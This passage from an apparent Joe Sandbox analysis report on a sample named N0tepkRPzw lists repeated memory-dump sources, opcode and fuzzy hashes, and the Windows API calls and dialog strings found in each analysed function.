              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: _free$ErrorFreeHeapLast
              • String ID:
              • API String ID: 776569668-0
              • Opcode ID: 21407bd6bdb94eb3e445ba1f448631c5de4bb84864cfc4e6e79d1f75fdce6087
              • Instruction ID: 91f9b2a083c69a376cb4a3246993a3677487ebfb44de3d97ba83f60b44ed47b2
              • Opcode Fuzzy Hash: 21407bd6bdb94eb3e445ba1f448631c5de4bb84864cfc4e6e79d1f75fdce6087
              • Instruction Fuzzy Hash: E7F0F432514211A7C624EB55ED8AD1AB3DAFE00724758C806F10CD7A11EB61FC444E74
              APIs
              • _free.LIBCMT ref: 00D7807E
                • Part of subcall function 00D784DE: RtlFreeHeap.NTDLL(00000000,00000000,?,00D7BFA7,?,00000000,?,00000000,?,00D7BFCE,?,00000007,?,?,00D7C3CB,?), ref: 00D784F4
                • Part of subcall function 00D784DE: GetLastError.KERNEL32(?,?,00D7BFA7,?,00000000,?,00000000,?,00D7BFCE,?,00000007,?,?,00D7C3CB,?,?), ref: 00D78506
              • _free.LIBCMT ref: 00D78090
              • _free.LIBCMT ref: 00D780A3
              • _free.LIBCMT ref: 00D780B4
              • _free.LIBCMT ref: 00D780C5
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: _free$ErrorFreeHeapLast
              • String ID:
              • API String ID: 776569668-0
              • Opcode ID: 7a751562dd071b2dbac669891d2692734b744ad78e047f97fe745dab153b4740
              • Instruction ID: ca7bf6c6c0696452be3ac9ccd2c07369b85da3d2f873e1687dff22a765ecad90
              • Opcode Fuzzy Hash: 7a751562dd071b2dbac669891d2692734b744ad78e047f97fe745dab153b4740
              • Instruction Fuzzy Hash: C9F03A78851325CBC7156F1ABC2A8093B66FB15724358870AF418D7B70EB710851AFF9
              APIs
              • __EH_prolog.LIBCMT ref: 00D57579
                • Part of subcall function 00D53B3D: __EH_prolog.LIBCMT ref: 00D53B42
              • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 00D57640
                • Part of subcall function 00D57BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 00D57C04
                • Part of subcall function 00D57BF5: GetLastError.KERNEL32 ref: 00D57C4A
                • Part of subcall function 00D57BF5: CloseHandle.KERNEL32(?), ref: 00D57C59
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
              • String ID: SeRestorePrivilege$SeSecurityPrivilege
              • API String ID: 3813983858-639343689
              • Opcode ID: 50d41e784b6358427d819e07c5126cf53175bf1d0e8e85878b5fd9dc69900b92
              • Instruction ID: dd50360b038fb94743cd39003df42c09341906c91232472da09f0fe4129c6614
              • Opcode Fuzzy Hash: 50d41e784b6358427d819e07c5126cf53175bf1d0e8e85878b5fd9dc69900b92
              • Instruction Fuzzy Hash: A5317E71908248AEEF20EB68EC41BEE7B69EF15755F14405AFC44E7292DB708A48CB71
              APIs
                • Part of subcall function 00D5130B: GetDlgItem.USER32(00000000,00003021), ref: 00D5134F
                • Part of subcall function 00D5130B: SetWindowTextW.USER32(00000000,00D835B4), ref: 00D51365
              • EndDialog.USER32(?,00000001), ref: 00D6A4B8
              • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 00D6A4CD
              • SetDlgItemTextW.USER32(?,00000066,?), ref: 00D6A4E2
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: ItemText$DialogWindow
              • String ID: ASKNEXTVOL
              • API String ID: 445417207-3402441367
              • Opcode ID: 6b9453e4f8052a47640e6cf3a32ad31269973bf0cebb32daeee3130b381952c8
              • Instruction ID: c09f71a70a5ef14dfa92909e9c5ca44e0703a866e04e115c167fb100de1b2640
              • Opcode Fuzzy Hash: 6b9453e4f8052a47640e6cf3a32ad31269973bf0cebb32daeee3130b381952c8
              • Instruction Fuzzy Hash: 4A118132244304EFDA219F6C9C4DF663BA9EB4A741F140205F689EA1A0CBA1E915DB32
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: __fprintf_l_strncpy
              • String ID: $%s$@%s
              • API String ID: 1857242416-834177443
              • Opcode ID: 98ddb910e3bf25ccc0709a310e2ea6763ef86d0e015d3b5ef9f603bc0c2d8124
              • Instruction ID: 33c9ee64e110540540e6a0b4ccafe53d27a3a433d86451a52e120865a1c056cd
              • Opcode Fuzzy Hash: 98ddb910e3bf25ccc0709a310e2ea6763ef86d0e015d3b5ef9f603bc0c2d8124
              • Instruction Fuzzy Hash: 98215E32440348AEDF30AEA4CC06FDE7BA9EF05701F044512FE1596191E371DA599B76
              APIs
                • Part of subcall function 00D5130B: GetDlgItem.USER32(00000000,00003021), ref: 00D5134F
                • Part of subcall function 00D5130B: SetWindowTextW.USER32(00000000,00D835B4), ref: 00D51365
              • EndDialog.USER32(?,00000001), ref: 00D6A9DE
              • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 00D6A9F6
              • SetDlgItemTextW.USER32(?,00000067,?), ref: 00D6AA24
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: ItemText$DialogWindow
              • String ID: GETPASSWORD1
              • API String ID: 445417207-3292211884
              • Opcode ID: 9b099f11ccc841d08b6f70412b6673b8a99ac692d94e76feeccced0175995879
              • Instruction ID: 6c15822f0548da6467f87a58b77e3bda16bc0a1cdf69a6ed665383904a34202b
              • Opcode Fuzzy Hash: 9b099f11ccc841d08b6f70412b6673b8a99ac692d94e76feeccced0175995879
              • Instruction Fuzzy Hash: C511E533940218BBDB21AAA89D49FFA776CEB49711F140112FAC5F2190C261DE59DF72
              APIs
              • _swprintf.LIBCMT ref: 00D5B51E
                • Part of subcall function 00D5400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D5401D
              • _wcschr.LIBVCRUNTIME ref: 00D5B53C
              • _wcschr.LIBVCRUNTIME ref: 00D5B54C
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: _wcschr$__vswprintf_c_l_swprintf
              • String ID: %c:\
              • API String ID: 525462905-3142399695
              • Opcode ID: 5befb6551b772f8577c4e696dcbce7f970b8f31ab04b6470b0996033bd8c4e5b
              • Instruction ID: c5f7ab3e6378492ff14455cc77391e27d0b46de70b76022f5aeb99753a964002
              • Opcode Fuzzy Hash: 5befb6551b772f8577c4e696dcbce7f970b8f31ab04b6470b0996033bd8c4e5b
              • Instruction Fuzzy Hash: 8101F953904311BACF28AB799C42D2BB7ACEE953B2754841BFC49C6081FF20D948C2B2
              APIs
              • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,00D5ABC5,00000008,?,00000000,?,00D5CB88,?,00000000), ref: 00D606F3
              • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,00D5ABC5,00000008,?,00000000,?,00D5CB88,?,00000000), ref: 00D606FD
              • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00D5ABC5,00000008,?,00000000,?,00D5CB88,?,00000000), ref: 00D6070D
              Strings
              • Thread pool initialization failed., xrefs: 00D60725
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: Create$CriticalEventInitializeSectionSemaphore
              • String ID: Thread pool initialization failed.
              • API String ID: 3340455307-2182114853
              • Opcode ID: f695a81b112ceb2a332966201875557d32425fedbf7529ab161e5b0623d14384
              • Instruction ID: 5a98fafa6f2898ca2e14bb87cd78df6778e76067edb0f0cbb14307aac16b46bf
              • Opcode Fuzzy Hash: f695a81b112ceb2a332966201875557d32425fedbf7529ab161e5b0623d14384
              • Instruction Fuzzy Hash: C91170B1505709AFC3215FA5DC84AA7FBECEB95755F10482EF1DA83200D6716980CB70
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID:
              • String ID: RENAMEDLG$REPLACEFILEDLG
              • API String ID: 0-56093855
              • Opcode ID: 701088a3a182c92a231c90e9be97d38f581676da4631c754c5ed793e3c2af29c
              • Instruction ID: b27285f942fbbd4e59a903d3b8bedcbe0b68e6f4742c7844bee602950ba34520
              • Opcode Fuzzy Hash: 701088a3a182c92a231c90e9be97d38f581676da4631c754c5ed793e3c2af29c
              • Instruction Fuzzy Hash: 3E017172A00345AFCB119F54FD44A6A3FABEB19790B040426F545D2330CA71DC50EBB1
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: __alldvrm$_strrchr
              • String ID:
              • API String ID: 1036877536-0
              • Opcode ID: e90b1fa23aba202bba093109adefdb56eea12b49e9ded63ef510ee75c2e44a9f
              • Instruction ID: ed88838279ad0e4cbd51b41dd47236aa06a62d4b5f70e774efae0569617f2916
              • Opcode Fuzzy Hash: e90b1fa23aba202bba093109adefdb56eea12b49e9ded63ef510ee75c2e44a9f
              • Instruction Fuzzy Hash: 14A16A739003469FDB21CF68C8A17AEFBE5EF51314F18816DE48D9B281E6349942C774
              APIs
              • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000000,?,00D580B7,?,?,?), ref: 00D5A351
              • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000000,?,00D580B7,?,?), ref: 00D5A395
              • SetFileTime.KERNEL32(?,00000800,?,00000000,?,00000000,?,00D580B7,?,?,?,?,?,?,?,?), ref: 00D5A416
              • CloseHandle.KERNEL32(?,?,00000000,?,00D580B7,?,?,?,?,?,?,?,?,?,?,?), ref: 00D5A41D
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: File$Create$CloseHandleTime
              • String ID:
              • API String ID: 2287278272-0
              • Opcode ID: f682e712164334411e6fcce2c56f9b31ec6eaab7f26ee86dd7a19befec51134f
              • Instruction ID: 3ee0acf76780c12a20129092f07c56f45cdb3b0bc5ed962bb169a405cbe90419
              • Opcode Fuzzy Hash: f682e712164334411e6fcce2c56f9b31ec6eaab7f26ee86dd7a19befec51134f
              • Instruction Fuzzy Hash: 4341EF302483959AEB21DF68DC45BAFBBE8AB81705F080A1DBDD4D7180D6649A4CDB73
              APIs
              • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00D789AD,?,00000000,?,00000001,?,?,00000001,00D789AD,?), ref: 00D7C0E6
              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00D7C16F
              • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00D767E2,?), ref: 00D7C181
              • __freea.LIBCMT ref: 00D7C18A
                • Part of subcall function 00D78518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00D7C13D,00000000,?,00D767E2,?,00000008,?,00D789AD,?,?,?), ref: 00D7854A
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
              • String ID:
              • API String ID: 2652629310-0
              • Opcode ID: be1aae010c8f4a43b106227357081eea463d1e2ae7d9a27462ab68c8edef49ba
              • Instruction ID: 4527da853c97fea86a21cf65552b1826c185f36766a14b2a6fcc2e41efa3d327
              • Opcode Fuzzy Hash: be1aae010c8f4a43b106227357081eea463d1e2ae7d9a27462ab68c8edef49ba
              • Instruction Fuzzy Hash: CB31CD72A2021AAFDB248F64DC85DAE7BA5EB40710F498129FC08D6251EB35DD51CBB0
              APIs
              • ___BuildCatchObject.LIBVCRUNTIME ref: 00D7251A
                • Part of subcall function 00D72B52: ___AdjustPointer.LIBCMT ref: 00D72B9C
              • _UnwindNestedFrames.LIBCMT ref: 00D72531
              • ___FrameUnwindToState.LIBVCRUNTIME ref: 00D72543
              • CallCatchBlock.LIBVCRUNTIME ref: 00D72567
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
              • String ID:
              • API String ID: 2633735394-0
              • Opcode ID: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
              • Instruction ID: 48ba64a79a36f5e01fb753d8f09a1d124db5fd82d5a82cd91396596d4090380c
              • Opcode Fuzzy Hash: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
              • Instruction Fuzzy Hash: 3E012532000188BBCF129F65DC41EEA3BBAEF58714F158414FD1C66120E376E961EBB1
              APIs
              • GetDC.USER32(00000000), ref: 00D69DBE
              • GetDeviceCaps.GDI32(00000000,00000058), ref: 00D69DCD
              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00D69DDB
              • ReleaseDC.USER32(00000000,00000000), ref: 00D69DE9
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: CapsDevice$Release
              • String ID:
              • API String ID: 1035833867-0
              • Opcode ID: e07d826b28c2e8e0c8ba06ded611e014c1092b8c20c4474049537699b1c7485d
              • Instruction ID: 42d34e07efbe5863600fd79c00d537ac5cd6ed3b5bae2431f5e27cf0486923d7
              • Opcode Fuzzy Hash: e07d826b28c2e8e0c8ba06ded611e014c1092b8c20c4474049537699b1c7485d
              • Instruction Fuzzy Hash: 55E0EC32985721E7D3202BA4BC4DBAB7B55AF0AB12F050215F605D6390DA744405DFB1
              APIs
              • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00D72016
              • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00D7201B
              • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00D72020
                • Part of subcall function 00D7310E: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 00D7311F
              • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00D72035
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
              • String ID:
              • API String ID: 1761009282-0
              • Opcode ID: 50341c1e121bd6f5d5b78c5b3ee2afe6a0478775b34c66270a9efbcfed992c13
